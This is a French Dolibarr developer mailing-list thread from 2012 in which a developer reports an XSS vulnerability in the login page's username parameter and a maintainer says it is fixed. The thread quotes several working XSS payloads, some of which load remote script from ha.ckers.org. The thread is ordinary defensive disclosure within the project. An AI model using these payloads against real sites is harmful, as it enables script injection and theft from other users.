c'était les GETPOST dans les templates, ils sont déjà géré dans
security2.lib.php
Le 08/09/12 13:22, Laurent Destailleur
a écrit :
Fixed
Le 08/09/2012 13:11, Régis Houssin a écrit :
ce qui est étonnant c'est que ça ne le fait pas sur la 3.1
Le 08/09/12 13:08, The mailing-list
for Dolibarr foundation members a écrit :
je préviens le bureau quand même :-)
à mettre dans l'url de la page de login
l'image appelée pourrais contenir n'importe quel autre code
je dit ça je dit rien :-)
/index.php?username="><SCRIPT SRC=""
moz-do-not-send="true" class="moz-txt-link-rfc2396E"
href="http://ha.ckers.org/xss.jpg">"http://ha.ckers.org/xss.jpg"></SCRIPT>
Le 08/09/12 12:57, Régis Houssin
a écrit :
celui là passe en GET
/index.php?username="><LAYER
SRC="" moz-do-not-send="true" class="moz-txt-link-rfc2396E" href="http://ha.ckers.org/scriptlet.html">"http://ha.ckers.org/scriptlet.html"></LAYER>
Le 08/09/12 12:48, Régis Houssin a écrit :
encore mieux :-)
celui là renvoi bien une fenêtre d'alerte
"><BODY
Le 08/09/12 12:34, Régis Houssin a écrit :
utilise ceci dans le champ "login" de la page d'authentification et valide
et regarde le source de la page
pas d'alerte _javascript_ mais une possible faille, le code est injecté
tel quel
"><IMG SRC="" moz-do-not-send="true" class="moz-txt-link-rfc2396E" href="_javascript_:alert('XSS');">"_javascript_:alert('XSS');">
Cordialement,
Cordialement,
Cordialement,
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
--
Laurent
EMail: address@hidden
Web: http://www.destailleur.fr
Messenger GTalk/Jabber: address@hidden
Tel: 0662724322
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
|